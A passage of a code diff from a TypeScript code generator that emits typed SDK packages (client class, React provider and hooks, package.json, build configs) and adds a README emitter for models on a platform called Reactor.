+    if (fieldDoc.length > 0) lines.push(indent(generateJsDoc(fieldDoc), 1));
+    lines.push(`  ${name}: ${tsType};`);
+  }
+
+  lines.push("}");
+  return lines.join("\n");
+}
+
+function generateMessageUnion(
+  modelPrefix: string,
+  messages: MessageSchema[],
+): string {
+  if (messages.length === 0) return "";
+
+  const members = messages.map(
+    (m) => `  | ${modelPrefix}${toPascalCase(m.name)}Message`,
+  );
+  return `export type ${modelPrefix}Message =\n${members.join("\n")};`;
+}
+
+// ---------------------------------------------------------------------------
+// Track constants
+// ---------------------------------------------------------------------------
+
+function generateTrackConstants(
+  modelPrefix: string,
+  tracks: TrackSchema[],
+): string {
+  if (tracks.length === 0) return "";
+
+  const lines: string[] = [];
+  lines.push(`export const ${modelPrefix}Tracks = {`);
+  for (const track of tracks) {
+    const constName = track.name.toUpperCase();
+    lines.push(
+      `  ${constName}: { name: "${track.name}", kind: "${track.kind}", direction: "${track.direction}" },`,
+    );
+  }
+  lines.push("} as const;");
+  return lines.join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// Options type + client class
+// ---------------------------------------------------------------------------
+
+function generateOptionsType(modelPrefix: string): string {
+  const lines: string[] = [];
+  lines.push(
+    generateJsDoc(
+      [
+        `Options for creating a ${modelPrefix}Model (model name is set automatically).`,
+      ],
+      0,
+    ),
+  );
+  lines.push(`export interface ${modelPrefix}Options {`);
+  lines.push(`  apiUrl?: string;`);
+  lines.push(`  local?: boolean;`);
+  lines.push("}");
+  return lines.join("\n");
+}
+
+function generateClientClass(
+  modelPrefix: string,
+  events: EventSchema[],
+  messages: MessageSchema[],
+): string {
+  const className = `${modelPrefix}Model`;
+  const optionsType = `${modelPrefix}Options`;
+  const needsFileRef = events.some(hasUploadRefParam);
+
+  const lines: string[] = [];
+
+  const classDoc = [
+    `Strongly-typed client for the ${modelPrefix} model.`,
+    "",
+    "Creates a Reactor connection with the model name pre-configured.",
+    "Provides typed methods for every event and typed message listeners.",
+  ];
+  lines.push(generateJsDoc(classDoc, 0));
+  lines.push(`export class ${className} {`);
+  lines.push(`  readonly reactor: Reactor;`);
+  lines.push("");
+  lines.push(`  constructor(options?: ${optionsType}) {`);
+  lines.push(
+    `    this.reactor = new Reactor({ ...options, modelName: MODEL_NAME });`,
+  );
+  lines.push(`  }`);
+  lines.push("");
+  lines.push(`  async connect(jwtToken?: string): Promise<void> {`);
+  lines.push(`    await this.reactor.connect(jwtToken);`);
+  lines.push(`  }`);
+  lines.push("");
+  lines.push(`  async disconnect(): Promise<void> {`);
+  lines.push(`    await this.reactor.disconnect();`);
+  lines.push(`  }`);
+
+  for (const event of events) {
+    const methodName = toCamelCase(event.name);
+    const fields = Object.entries(event.fields);
+    const hasParams = fields.length > 0;
+    const paramType = hasParams
+      ? `${modelPrefix}${toPascalCase(event.name)}Params`
+      : undefined;
+
+    lines.push("");
+
+    const methodDoc: string[] = [];
+    if (event.description) methodDoc.push(event.description);
+    if (hasParams) methodDoc.push(`@param params - ${event.description}`);
+    lines.push(indent(generateJsDoc(methodDoc), 1));
+
+    if (paramType) {
+      lines.push(
+        `  async ${methodName}(params: ${paramType}): Promise<void> {`,
+      );
+      lines.push(
+        `    await this.reactor.sendCommand(${JSON.stringify(event.name)}, params);`,
+      );
+    } else {
+      lines.push(`  async ${methodName}(): Promise<void> {`);
+      lines.push(
+        `    await this.reactor.sendCommand(${JSON.stringify(event.name)}, {});`,
+      );
+    }
+    lines.push(`  }`);
+  }
+
+  if (messages.length > 0) {
+    lines.push("");
+    const listenerDoc = [
+      "Subscribe to typed model messages.",
+      `@param handler - Called with a discriminated ${modelPrefix}Message`,
+      "@returns Unsubscribe function",
+    ];
+    lines.push(indent(generateJsDoc(listenerDoc), 1));
+    lines.push(
+      `  onMessage(handler: (message: ${modelPrefix}Message) => void): () => void {`,
+    );
+    lines.push(`    const wrappedHandler = (raw: unknown) => {`);
+    lines.push(`      handler(_unwrapMessage<${modelPrefix}Message>(raw));`);
+    lines.push(`    };`);
+    lines.push(`    this.reactor.on("message", wrappedHandler);`);
+    lines.push(`    return () => this.reactor.off("message", wrappedHandler);`);
+    lines.push(`  }`);
+
+    for (const message of messages) {
+      const hookName = `on${toPascalCase(message.name)}`;
+      const msgType = `${modelPrefix}${toPascalCase(message.name)}Message`;
+      lines.push("");
+      lines.push(
+        indent(
+          generateJsDoc([
+            `Subscribe to "${message.name}" messages only.`,
+            `@returns Unsubscribe function`,
+          ]),
+          1,
+        ),
+      );
+      lines.push(
+        `  ${hookName}(handler: (message: ${msgType}) => void): () => void {`,
+      );
+      lines.push(`    return this.onMessage((msg) => {`);
+      lines.push(
+        `      if (msg.type === ${JSON.stringify(message.name)}) handler(msg as ${msgType});`,
+      );
+      lines.push(`    });`);
+      lines.push(`  }`);
+    }
+  }
+
+  if (needsFileRef) {
+    lines.push("");
+    const uploadDoc = [
+      "Upload a file and get a FileRef for use in events.",
+      "@param file - File or Blob to upload",
+      "@param options - Optional name override",
+    ];
+    lines.push(indent(generateJsDoc(uploadDoc), 1));
+    lines.push(
+      `  async uploadFile(file: File | Blob, options?: { name?: string }): Promise<FileRef> {`,
+    );
+    lines.push(`    return this.reactor.uploadFile(file, options);`);
+    lines.push(`  }`);
+  }
+
+  lines.push("}");
+  return lines.join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// React file (optional): provider + typed command hook + per-message hooks
+// ---------------------------------------------------------------------------
+//
+// Design choices, in case you're reviewing and wondering:
+//
+//   - We use `React.createElement` rather than JSX so the emitter stays a
+//     pure string builder with no JSX-escaping concerns and the generated
+//     file can stay `.ts` (not `.tsx`). tsup/TS handle this fine.
+//
+//   - The provider is a thin wrapper around `ReactorProvider` that bakes in
+//     `modelName: MODEL_NAME` and `modelTracks: [...<Prefix>Tracks]`, so
+//     consumers never have to wire those up themselves.
+//
+//   - The `use<Prefix>()` hook exposes typed `sendCommand`-bound methods
+//     (one per event), plus `status`, and — when any event takes an upload
+//     reference — `uploadFile`. It selects state from the store via
+//     `useReactor` so it re-renders on `status` changes.
+//
+//   - Per-message hooks (`use<Prefix><Msg>`) filter by the discriminator
+//     (`type: "..."`) inside `useReactorMessage` and hand the handler the
+//     exact typed message. The catch-all `use<Prefix>Message` is just a
+//     typed passthrough for consumers that want the union.
+
+function generateReactHooksForMessages(
+  modelPrefix: string,
+  messages: MessageSchema[],
+): string {
+  if (messages.length === 0) return "";
+
+  const lines: string[] = [];
+  for (const message of messages) {
+    const hookName = `use${modelPrefix}${toPascalCase(message.name)}`;
+    const msgType = `${modelPrefix}${toPascalCase(message.name)}Message`;
+
+    lines.push(
+      generateJsDoc(
+        [
+          `Subscribe to "${message.name}" messages only.`,
+          `Handler receives a fully-typed ${msgType}.`,
+        ],
+        0,
+      ) +
+        `export function ${hookName}(
+  handler: (message: ${msgType}) => void,
+): void {
+  useReactorMessage((msg: unknown) => {
+    const m = _unwrapMessage<${modelPrefix}Message>(msg);
+    if (m.type === ${JSON.stringify(message.name)}) {
+      handler(m as ${msgType});
+    }
+  });
+}`,
+    );
+  }
+
+  return lines.join("\n\n");
+}
+
+function generateUseModelHook(
+  modelPrefix: string,
+  events: EventSchema[],
+): string {
+  const hookName = `use${modelPrefix}`;
+  const needsFileRef = events.some(hasUploadRefParam);
+
+  const methods: string[] = [];
+  for (const event of events) {
+    const methodName = toCamelCase(event.name);
+    const fields = Object.entries(event.fields);
+    const paramType = fields.length
+      ? `${modelPrefix}${toPascalCase(event.name)}Params`
+      : undefined;
+
+    if (paramType) {
+      methods.push(
+        `    ${methodName}: (params: ${paramType}): Promise<void> =>
+      sendCommand(${JSON.stringify(event.name)}, params),`,
+      );
+    } else {
+      methods.push(
+        `    ${methodName}: (): Promise<void> =>
+      sendCommand(${JSON.stringify(event.name)}, {}),`,
+      );
+    }
+  }
+
+  if (needsFileRef) {
+    methods.push(
+      `    uploadFile: (
+      file: File | Blob,
+      options?: { name?: string },
+    ): Promise<FileRef> => uploadFile(file, options),`,
+    );
+  }
+
+  const doc = generateJsDoc(
+    [
+      `Access the ${modelPrefix} model as typed commands bound to the nearest`,
+      `{@link ${modelPrefix}Provider}. Re-renders when \`status\` changes.`,
+      "",
+      "Returns the full action surface — connection `status`, `connect` /",
+      "`disconnect` for manual lifecycle control, one method per model event" +
+        (needsFileRef ? ", and `uploadFile` for upload-reference params" : "") +
+        ".",
+      "",
+      "`connect` / `disconnect` are pulled off the store so consumers using",
+      `\`<${modelPrefix}Provider>\` with \`autoConnect: false\` (or manual reconnect`,
+      "flows) don't have to reach for the raw `useReactor` hook themselves,",
+      "which in turn would force `@reactor-team/js-sdk` to be a direct",
+      "dependency instead of a transitive one through this package.",
+    ],
+    0,
+  );
+
+  // `connect` / `disconnect` are pulled off the store so consumers using
+  // `<Prefix>Provider` with `autoConnect: false` (or any manual reconnect
+  // flow) don't have to reach for `useReactor` themselves. Function
+  // identities are stable across renders because they're Zustand actions.
+  return `${doc}export function ${hookName}() {
+  const sendCommand = useReactor((s) => s.sendCommand);${
+    needsFileRef
+      ? `
+  const uploadFile = useReactor((s) => s.uploadFile);`
+      : ""
+  }
+  const connect = useReactor((s) => s.connect);
+  const disconnect = useReactor((s) => s.disconnect);
+  const status = useReactor((s) => s.status);
+
+  return {
+    status,
+    connect,
+    disconnect,
+${methods.join("\n")}
+  };
+}`;
+}
+
+function generateProviderComponent(
+  modelPrefix: string,
+  hasTracks: boolean,
+): string {
+  const providerName = `${modelPrefix}Provider`;
+  const optionsType = `${modelPrefix}Options`;
+
+  const doc = generateJsDoc(
+    [
+      `Provider for the ${modelPrefix} model.`,
+      "",
+      "Wraps {@link ReactorProvider} with `modelName` " +
+        (hasTracks ? "and `modelTracks` " : "") +
+        "pre-configured from the",
+      "generated constants. Drop this near the top of your tree, then use",
+      `{@link use${modelPrefix}} and the \`use${modelPrefix}<Message>\` hooks below it.`,
+    ],
+    0,
+  );
+
+  const providerProps = `{
+  apiUrl,
+  local,
+  jwtToken,
+  connectOptions,
+  children,
+}: ${providerName}Props`;
+
+  // `children` is part of ReactorProviderProps's required shape in @types/react
+  // under strict checks, so we must pass it *inside* the props object to
+  // `createElement` — not as a trailing variadic argument. The trailing-arg
+  // form ends up with children: undefined from TS's perspective, which
+  // fails to typecheck against the provider's declared prop type.
+  const reactorProviderProps = [
+    `      apiUrl: apiUrl,`,
+    `      local: local,`,
+    `      modelName: MODEL_NAME,`,
+  ];
+  if (hasTracks) {
+    reactorProviderProps.push(`      modelTracks: [...${modelPrefix}Tracks],`);
+  }
+  reactorProviderProps.push(
+    `      jwtToken: jwtToken,`,
+    `      connectOptions: connectOptions,`,
+    `      children: children,`,
+  );
+
+  return `export interface ${providerName}Props extends ${optionsType} {
+  jwtToken?: string;
+  connectOptions?: ReactorConnectOptions;
+  children: ReactNode;
+}
+
+${doc}export function ${providerName}(${providerProps}): ReactElement {
+  return createElement(ReactorProvider, {
+${reactorProviderProps.join("\n")}
+  });
+}`;
+}
+
+/**
+ * Emit `src/react.ts` — a standalone source file containing the
+ * `<Prefix>Provider` component, the `use<Prefix>()` command hook, and
+ * one typed listener hook per model message.
+ *
+ * The file is kept physically separate from `src/index.ts` (not
+ * inlined) so the React-specific imports, the `"use client";`
+ * directive, and the React runtime dependency are localised to one
+ * module. `src/index.ts` re-exports the public surface of this file
+ * via `export * from "./react.js";`, so downstream consumers still
+ * only ever `import { … } from "@reactor-models/<name>"` — they never
+ * reach for a subpath.
+ *
+ * Imports `MODEL_NAME` / `<Prefix>Tracks` / param + message types from
+ * `./index.js`. The circular import (index.ts re-exports from here,
+ * this file imports back) is safe because every value referenced from
+ * `./index.js` is declared before the re-export line in index.ts, and
+ * no React code actually runs at module load — Provider/hooks only
+ * execute when React calls them.
+ */
+function generateReactFile(options: CodegenOptions): string {
+  const { schema } = options;
+  const modelPrefix = toPascalCase(schema.modelName);
+  const events = schema.events;
+  const messages = schema.messages;
+  const hasTracks = schema.tracks.length > 0;
+  const needsFileRef = events.some(hasUploadRefParam);
+
+  const sections: string[] = [];
+
+  sections.push(
+    `// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.`,
+  );
+  sections.push("");
+  sections.push(`// Auto-generated by @reactor-team/codegen — DO NOT EDIT`);
+  sections.push(
+    `// Model: ${schema.modelName} ${formatVersionForHeader(schema.modelVersion)}`,
+  );
+  sections.push("");
+  sections.push(`"use client";`);
+  sections.push("");
+
+  // React imports. `createElement` lets us stay in `.ts` (no JSX).
+  sections.push(
+    `import { createElement, type ReactElement, type ReactNode } from "react";`,
+  );
+
+  // SDK imports. We only import what the emitted surface actually uses so
+  // tree-shaking in the consumer project stays tight.
+  const sdkImports = [
+    "ReactorProvider",
+    "useReactor",
+    ...(messages.length > 0 ? ["useReactorMessage"] : []),
+    "type ReactorConnectOptions",
+  ];
+  if (needsFileRef) sdkImports.push("type FileRef");
+  sections.push(
+    `import {\n  ${sdkImports.join(",\n  ")},\n} from "@reactor-team/js-sdk";`,
+  );
+
+  // Pull the generated constants and types from the sibling index.ts.
+  // The `.js` extension is required for Node's ESM resolver and matches
+  // what tsup produces.
+  const localImports: string[] = ["MODEL_NAME"];
+  if (hasTracks) localImports.push(`${modelPrefix}Tracks`);
+  localImports.push(`type ${modelPrefix}Options`);
+  for (const event of events) {
+    const fieldCount = Object.keys(event.fields).length;
+    if (fieldCount > 0) {
+      localImports.push(`type ${modelPrefix}${toPascalCase(event.name)}Params`);
+    }
+  }
+  if (messages.length > 0) {
+    localImports.push(`type ${modelPrefix}Message`);
+    for (const message of messages) {
+      localImports.push(
+        `type ${modelPrefix}${toPascalCase(message.name)}Message`,
+      );
+    }
+  }
+  sections.push(
+    `import {\n  ${localImports.join(",\n  ")},\n} from "./index.js";`,
+  );
+  sections.push("");
+
+  // The per-message / catch-all hooks below call `_unwrapMessage` to
+  // flatten the SDK's `{ type, data, uploads? }` envelope into the
+  // shape the typed message interfaces declare. Duplicated (rather
+  // than imported from `./index.js`) so the React file stays
+  // self-contained at runtime and the helper never surfaces in the
+  // generated package's public exports. Only emitted when the schema
+  // has at least one message — otherwise no hook references it.
+  if (messages.length > 0) {
+    sections.push(UNWRAP_MESSAGE_HELPER);
+    sections.push("");
+  }
+
+  // Provider.
+  sections.push(generateProviderComponent(modelPrefix, hasTracks));
+  sections.push("");
+
+  // use<Prefix>() hook.
+  sections.push(generateUseModelHook(modelPrefix, events));
+
+  // Per-message hooks.
+  if (messages.length > 0) {
+    sections.push("");
+    sections.push(
+      generateJsDoc(
+        [
+          `Subscribe to any ${modelPrefix} message with a fully-typed handler.`,
+          `The handler receives a discriminated ${modelPrefix}Message.`,
+        ],
+        0,
+      ) +
+        `export function use${modelPrefix}Message(
+  handler: (message: ${modelPrefix}Message) => void,
+): void {
+  useReactorMessage((msg: unknown) =>
+    handler(_unwrapMessage<${modelPrefix}Message>(msg)),
+  );
+}`,
+    );
+
+    sections.push("");
+    sections.push(generateReactHooksForMessages(modelPrefix, messages));
+  }
+
+  sections.push("");
+  return sections.join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// Full source file assembly
+// ---------------------------------------------------------------------------
+
+function generateSourceFile(options: CodegenOptions): string {
+  const { schema } = options;
+  const modelPrefix = toPascalCase(schema.modelName);
+  const events = schema.events;
+  const messages = schema.messages;
+  const tracks = schema.tracks;
+  const withReact = !!options.react;
+
+  const needsFileRef = events.some(hasUploadRefParam);
+
+  const sections: string[] = [];
+
+  sections.push(
+    `// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.`,
+  );
+  sections.push("");
+  sections.push(`// Auto-generated by @reactor-team/codegen — DO NOT EDIT`);
+  sections.push(
+    `// Model: ${schema.modelName} ${formatVersionForHeader(schema.modelVersion)}`,
+  );
+  sections.push("");
+
+  // `"use client";` goes at the very top of `src/index.ts` when React
+  // output is on, because the file re-exports from `./react.js` below
+  // — i.e. the bundled `dist/index.js` contains the Provider + hooks,
+  // so the whole module is a client-only boundary in the React Server
+  // Components world. The plain-JS `Reactor` client below already only
+  // runs in the browser (WebRTC doesn't exist server-side), so nothing
+  // legitimate is lost by marking it client-only; consumers can still
+  // import `MODEL_NAME` / types / the `Model` class from server
+  // components via Next.js's client-reference passthrough.
+  if (withReact) {
+    sections.push(`"use client";`);
+    sections.push("");
+  }
+
+  const imports = ["Reactor"];
+  if (needsFileRef) imports.push("FileRef");
+  sections.push(
+    `import { ${imports.join(", ")} } from "@reactor-team/js-sdk";`,
+  );
+
+  // Re-export FileRef so consumers can import the class + its type
+  // straight from `@reactor-models/<name>` instead of threading a
+  // second import to `@reactor-team/js-sdk` just to annotate a
+  // variable holding the result of `uploadFile()`. Gated on
+  // `needsFileRef` so a model without upload-reference events never
+  // carries a dead re-export.
+  if (needsFileRef) {
+    sections.push(`export { FileRef };`);
+  }
+  sections.push("");
+
+  sections.push(
+    `export const MODEL_NAME = ${JSON.stringify(schema.modelName)} as const;`,
+  );
+  sections.push(
+    `export const MODEL_VERSION = ${JSON.stringify(formatVersionForModelConstant(schema.modelVersion))} as const;`,
+  );
+
+  if (tracks.length > 0) {
+    sections.push("");
+    sections.push(generateTrackConstants(modelPrefix, tracks));
+  }
+
+  for (const event of events) {
+    const iface = generateParamInterface(modelPrefix, event);
+    if (iface) {
+      sections.push("");
+      sections.push(iface);
+    }
+  }
+
+  for (const message of messages) {
+    sections.push("");
+    sections.push(generateMessageInterface(modelPrefix, message));
+  }
+
+  if (messages.length > 0) {
+    sections.push("");
+    sections.push(generateMessageUnion(modelPrefix, messages));
+  }
+
+  sections.push("");
+  sections.push(generateOptionsType(modelPrefix));
+  // The class's `onMessage` / `on<Name>` wrappers call `_unwrapMessage`
+  // to flatten the SDK's `{ type, data, uploads? }` envelope into the
+  // shape the typed message interfaces declare. Only emitted when the
+  // schema has at least one message — otherwise the class doesn't use
+  // it and we'd ship dead code.
+  if (messages.length > 0) {
+    sections.push("");
+    sections.push(UNWRAP_MESSAGE_HELPER);
+  }
+  sections.push("");
+  sections.push(generateClientClass(modelPrefix, events, messages));
+
+  // Re-export everything the React file defines so consumers only ever
+  // import from `@reactor-models/<name>` — no `/react` subpath. The
+  // re-export must come *after* every value declaration above, so the
+  // circular `react.ts → index.ts` imports (for `MODEL_NAME`,
+  // `<Prefix>Tracks`, etc.) resolve to fully-initialised bindings.
+  if (withReact) {
+    sections.push("");
+    sections.push(`export * from "./react.js";`);
+  }
+
+  sections.push("");
+  return sections.join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// Package scaffolding
+// ---------------------------------------------------------------------------
+
+function generatePackageJson(options: CodegenOptions): string {
+  // Single entry at the package root — the Provider + hooks (when
+  // `options.react`) live in `src/index.ts` alongside the plain-JS
+  // client, so consumers never need a `/react` subpath.
+  const exports: Record<string, Record<string, string>> = {
+    ".": {
+      types: "./dist/index.d.ts",
+      import: "./dist/index.mjs",
+      require: "./dist/index.js",
+    },
+  };
+
+  // React is only a peer dependency when React emission is on. We list it
+  // here (not `dependencies`) so consumers resolve to their own React
+  // copy and we don't force-duplicate the renderer.
+  const peerDependencies = options.react ? { react: ">=18" } : undefined;
+
+  const pkg = {
+    name: `@reactor-models/${options.schema.modelName}`,
+    version: formatVersionForPackageJson(options.schema.modelVersion),
+    description: `Strongly-typed SDK for the ${toPascalCase(options.schema.modelName)} model on Reactor`,
+    main: "dist/index.js",
+    module: "dist/index.mjs",
+    types: "dist/index.d.ts",
+    exports,
+    files: ["dist", "README.md"],
+    scripts: {
+      build: "tsup",
+    },
+    dependencies: {
+      "@reactor-team/js-sdk": `^${options.sdkVersion}`,
+    },
+    ...(peerDependencies ? { peerDependencies } : {}),
+    devDependencies: {
+      tsup: "^8.5.0",
+      typescript: "^5.8.3",
+      ...(options.react
+        ? {
+            "@types/react": "^18.0.0",
+            react: "^18.0.0",
+          }
+        : {}),
+    },
+    keywords: [
+      "reactor",
+      options.schema.modelName,
+      "sdk",
+      "typed",
+      ...(options.react ? ["react", "hooks"] : []),
+    ],
+    author: "Reactor Technologies, Inc.",
+    license: "MIT",
+  };
+  return JSON.stringify(pkg, null, 2) + "\n";
+}
+
+function generateTsupConfig(_options: CodegenOptions): string {
+  return `import { defineConfig } from "tsup";
+
+export default defineConfig({
+  entry: ["src/index.ts"],
+  format: ["cjs", "esm"],
+  dts: true,
+  sourcemap: true,
+  clean: true,
+});
+`;
+}
+
+function generateTsConfig(): string {
+  const config = {
+    compilerOptions: {
+      target: "ES2022",
+      module: "ESNext",
+      moduleResolution: "bundler",
+      strict: true,
+      esModuleInterop: true,
+      skipLibCheck: true,
+      forceConsistentCasingInFileNames: true,
+      outDir: "dist",
+      rootDir: "src",
+      declaration: true,
+    },
+    include: ["src"],
+    exclude: ["node_modules", "dist"],
+  };
+  return JSON.stringify(config, null, 2) + "\n";
+}
+
+// ---------------------------------------------------------------------------
+// README emission lives in `./readme-emitter.ts`. See that module for
+// the template loader, placeholder substitution, and per-event /
+// per-message / per-track section emitters — the split keeps this file
+// focused on TypeScript emission and parallels the webapp's
+// `lib/model-api-doc.ts` layout.
+// ---------------------------------------------------------------------------
+
+// ---------------------------------------------------------------------------
+// Exported generator
+// ---------------------------------------------------------------------------
+
+export const generator = {
+  generate(options: CodegenOptions): GeneratedPackage {
+    const files = [
+      { path: "src/index.ts", content: generateSourceFile(options) },
+      { path: "package.json", content: generatePackageJson(options) },
+      { path: "tsup.config.ts", content: generateTsupConfig(options) },
+      { path: "tsconfig.json", content: generateTsConfig() },
+      // README sits at the package root, not under `src/`, per npm
+      // convention. `package.json`'s `files` array already lists it, so
+      // `npm pack` picks it up automatically.
+      { path: "README.md", content: generateReadme(options) },
+    ];
+
+    // When React output is on, emit `src/react.ts` as a sibling of
+    // `src/index.ts`. The main file re-exports everything from it, so
+    // the public surface is still a single root import — the split is
+    // purely a source-layout concern. Slotted right after `src/index.ts`
+    // for readable dry-run output.
+    if (options.react) {
+      files.splice(1, 0, {
+        path: "src/react.ts",
+        content: generateReactFile(options),
+      });
+    }
+
+    return { files };
+  },
+};
+
+// Re-export internal helpers for targeted unit testing.
+// Public API consumers should only use `generator` / `generateModelSdk`.
+export const __testing__ = {
+  toPascalCase,
+  toCamelCase,
+  fieldSchemaToTsType,
+  isUploadReference,
+  generateParamInterface,
+  generateMessageInterface,
+  generateMessageUnion,
+  generateTrackConstants,
+  generateReactFile,
+  stripBuildMetadata,
+  formatVersionForHeader,
+  formatVersionForPackageJson,
+  formatVersionForModelConstant,
+  sanitizeJsDocLine,
+  enumValueToTs,
+};

--- a/packages/codegen/src/index.ts
+++ b/packages/codegen/src/index.ts
@@ -1,6 +1,11 @@
 // Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.
 
-export { loadSchema, parseSchema } from "./openapi/index.js";
+export {
+  generateModelSdk,
+  writePackage,
+  loadSchema,
+  parseSchema,
+} from "./codegen.js";
 export type { OpenApiSchema } from "./openapi/index.js";
 export type {
   CodegenOptions,

--- a/packages/codegen/src/readme-emitter.ts
+++ b/packages/codegen/src/readme-emitter.ts
@@ -1,0 +1,628 @@
+// Copyright (c) 2026 Reactor Technologies, Inc. All rights reserved.
+
+// ---------------------------------------------------------------------------
+// README emitter — schema-driven model documentation in the same shape the
+// webapp's model-detail page renders.
+//
+// Kept as a separate module from the TypeScript emitter because:
+//   - They emit different languages (markdown vs TS) with different escape
+//     rules, and the combined file was creeping past 1500 lines.
+//   - README snippet logic mirrors `reactor-webapp/lib/model-api-doc.ts`;
+//     isolating it here makes the structural-lockstep relationship easier
+//     to audit and keep in sync.
+//   - Shared helpers (`toPascalCase`, `fieldSchemaToTsType`,
+//     `hasUploadRefParam`, `isUploadReference`, `formatVersionForHeader`)
+//     are imported from `./emitter`, so the split costs one import seam
+//     and buys a focused ~400-line file dedicated to README output.
+//
+// Scope is JavaScript + React only, per docs requirements.
+// ---------------------------------------------------------------------------
+
+import * as fs from "node:fs";
+import * as path from "node:path";
+import type {
+  CodegenOptions,
+  EventSchema,
+  FieldSchema,
+  MessageSchema,
+  TrackSchema,
+} from "./types.js";
+import {
+  fieldSchemaToTsType,
+  formatVersionForHeader,
+  hasUploadRefParam,
+  isUploadReference,
+  toCamelCase,
+  toPascalCase,
+} from "./emitter.js";
+
+// ---------------------------------------------------------------------------
+// Template loading + placeholder substitution.
+// ---------------------------------------------------------------------------
+
+/**
+ * Locate and read the README template from disk. The template lives at
+ * `<package>/templates/readme.md` in both the source tree (dev) and the
+ * published package (`files: ["dist", "README.md", "templates"]`), so a
+ * single `path.resolve(__dirname, "..", "templates/readme.md")` works
+ * across `tsx` dev runs, `vitest`, and installed consumers.
+ *
+ * Cached in a module-level variable so repeated `generateModelSdk` calls
+ * in the same process don't re-read the file.
+ */
+let cachedReadmeTemplate: string | null = null;
+function loadReadmeTemplate(): string {
+  if (cachedReadmeTemplate !== null) return cachedReadmeTemplate;
+  const templatePath = path.resolve(__dirname, "..", "templates/readme.md");
+  cachedReadmeTemplate = fs.readFileSync(templatePath, "utf-8");
+  return cachedReadmeTemplate;
+}
+
+/**
+ * Substitute `{{IDENTIFIER}}` tokens in the template. The regex matches
+ * ASCII uppercase/underscore tokens only, so JSX object literals in the
+ * template (`style={{ color: "red" }}`) are left untouched. Missing
+ * placeholder values throw rather than producing literal `{{X}}` in the
+ * output — a silent miss is worse than a loud emitter failure at build
+ * time.
+ */
+function renderTemplate(
+  template: string,
+  vars: Record<string, string>,
+): string {
+  return template.replace(/\{\{([A-Z_]+)\}\}/g, (_match, key: string) => {
+    if (!(key in vars)) {
+      throw new Error(`Unknown README placeholder {{${key}}}`);
+    }
+    return vars[key];
+  });
+}
+
+// ---------------------------------------------------------------------------
+// Small markdown helpers kept local to the README emitter so they don't
+// leak into the main TS-emission surface, where the conventions differ.
+// ---------------------------------------------------------------------------
+
+function describeFieldType(field: FieldSchema): string {
+  return fieldSchemaToTsType(field);
+}
+
+function fieldConstraintNotes(field: FieldSchema): string[] {
+  const out: string[] = [];
+  if (field.minimum !== undefined) out.push(`min ${field.minimum}`);
+  if (field.maximum !== undefined) out.push(`max ${field.maximum}`);
+  if (field.minLength !== undefined) out.push(`minLength ${field.minLength}`);
+  if (field.maxLength !== undefined) out.push(`maxLength ${field.maxLength}`);
+  if (field.default !== undefined) {
+    out.push(`default \`${JSON.stringify(field.default)}\``);
+  }
+  return out;
+}
+
+function mdEscape(text: string): string {
+  // Minimal escape for cell text inside a GFM table: only `|` and
+  // literal newlines need neutralising. Everything else passes through.
+  return text.replace(/\|/g, "\\|").replace(/\r?\n/g, " ");
+}
+
+function mdBacktickedCrossLinks(
+  text: string,
+  anchors: Record<string, string>,
+): string {
+  // Turn `\`token\`` into a markdown cross-link when `token` is a
+  // known event/message name; leave it as inline code otherwise. The
+  // regex is strict so an accidental template-string backtick in a
+  // description stays untouched.
+  if (!text) return "";
+  return text.replace(/`([a-zA-Z_][a-zA-Z0-9_]*)`/g, (match, token) => {
+    const href = anchors[token];
+    return href ? `[\`${token}\`](${href})` : match;
+  });
+}
+
+function mdFieldTable(
+  fields: [string, FieldSchema][],
+  kind: "param" | "field",
+  anchors: Record<string, string>,
+): string {
+  if (fields.length === 0) {
+    return kind === "param" ? "_No parameters._\n" : "_No fields._\n";
+  }
+  const headerLabel = kind === "param" ? "Parameter" : "Field";
+  const lines: string[] = [];
+  if (kind === "param") {
+    lines.push(`| ${headerLabel} | Type | Required | Description |`);
+    lines.push(`|---|---|---|---|`);
+  } else {
+    lines.push(`| ${headerLabel} | Type | Description |`);
+    lines.push(`|---|---|---|`);
+  }
+  for (const [name, field] of fields) {
+    // Enum field types render as `"a" | "b" | "c"` which contains
+    // literal pipes — those terminate the GFM table cell unless we
+    // backslash-escape them, even inside a code span (GFM recognises
+    // `\|` within ``…`` for tables specifically). `mdEscape` does the
+    // right thing for every schema-derived type string, including
+    // non-union ones that pass through untouched.
+    const type = "`" + mdEscape(describeFieldType(field)) + "`";
+    const required = field.default === undefined ? "✅" : "";
+    const descParts: string[] = [];
+    if (field.description) {
+      descParts.push(mdBacktickedCrossLinks(field.description, anchors));
+    }
+    const constraints = fieldConstraintNotes(field);
+    if (constraints.length > 0) {
+      descParts.push(`_(${constraints.join(", ")})_`);
+    }
+    const description = mdEscape(descParts.join(" ") || "—");
+    if (kind === "param") {
+      lines.push(`| \`${name}\` | ${type} | ${required} | ${description} |`);
+    } else {
+      lines.push(`| \`${name}\` | ${type} | ${description} |`);
+    }
+  }
+  return lines.join("\n") + "\n";
+}
+
+// ---------------------------------------------------------------------------
+// Snippet synthesis — JS + React variants per event / message.
+//
+// Mirrors the logic in reactor-webapp/lib/model-api-doc.ts; we keep the
+// two in structural lockstep so the README and the in-app docs stay
+// byte-for-byte equivalent. If the webapp's snippet rules ever change,
+// they should change here in the same commit.
+// ---------------------------------------------------------------------------
+
+/** Whether a default value is too empty to be illustrative in an example. */
+function isTrivialDefault(v: unknown): boolean {
+  return v === undefined || v === null || v === "" || v === 0;
+}
+
+function sampleValueJs(field: FieldSchema, fieldName: string): string {
+  if (isUploadReference(field)) return "fileRef";
+  if (field.enum && field.enum.length > 0) {
+    const v = field.enum[0];
+    return typeof v === "string" ? JSON.stringify(v) : String(v);
+  }
+  if (field.default !== undefined && !isTrivialDefault(field.default)) {
+    return JSON.stringify(field.default);
+  }
+  switch (field.type) {
+    case "string":
+      if (fieldName === "prompt") return '"A sunset over the ocean"';
+      return '""';
+    case "integer":
+    case "number":
+      return field.minimum !== undefined ? String(field.minimum) : "0";
+    case "boolean":
+      return "true";
+    default:
+      return "null";
+  }
+}
+
+/** Strictly required fields: no `default` declared. */
+function strictlyRequiredFields(event: EventSchema): [string, FieldSchema][] {
+  return Object.entries(event.fields).filter(
+    ([, f]) => f.default === undefined,
+  );
+}
+
+/**
